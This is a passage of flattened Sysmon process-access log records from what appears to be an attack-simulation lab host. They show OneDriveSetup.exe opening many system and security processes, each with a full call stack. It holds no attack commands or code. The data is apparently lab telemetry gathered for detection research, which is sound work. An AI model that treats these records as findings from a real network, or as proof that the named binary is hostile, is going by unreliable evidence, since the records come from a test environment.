Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.367{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.367{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A8-607E-8605-00000000BB01}2432C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.367{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.367{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-7905-00000000BB01}1224C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.367{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-7605-00000000BB01}4400C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dafb0|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000079753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.362{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.362{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.362{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.362{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EBF8-607E-DC0D-00000000BB01}1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.362{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.362{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.362{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-E388-607E-7E0A-00000000BB01}5724C:\Program Files\Suricata\suricata.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.362{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-E1EF-607E-1D0A-00000000BB01}7068C:\Windows\system32\NOTEPAD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.362{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-DFEF-607E-A109-00000000BB01}6196C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e156e|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+dab69|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+db081|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+daddf|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+d024b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf729|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba|C:\Windows\SYSTEM32\ntdll.dll+2b644(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34f26(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.362{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft 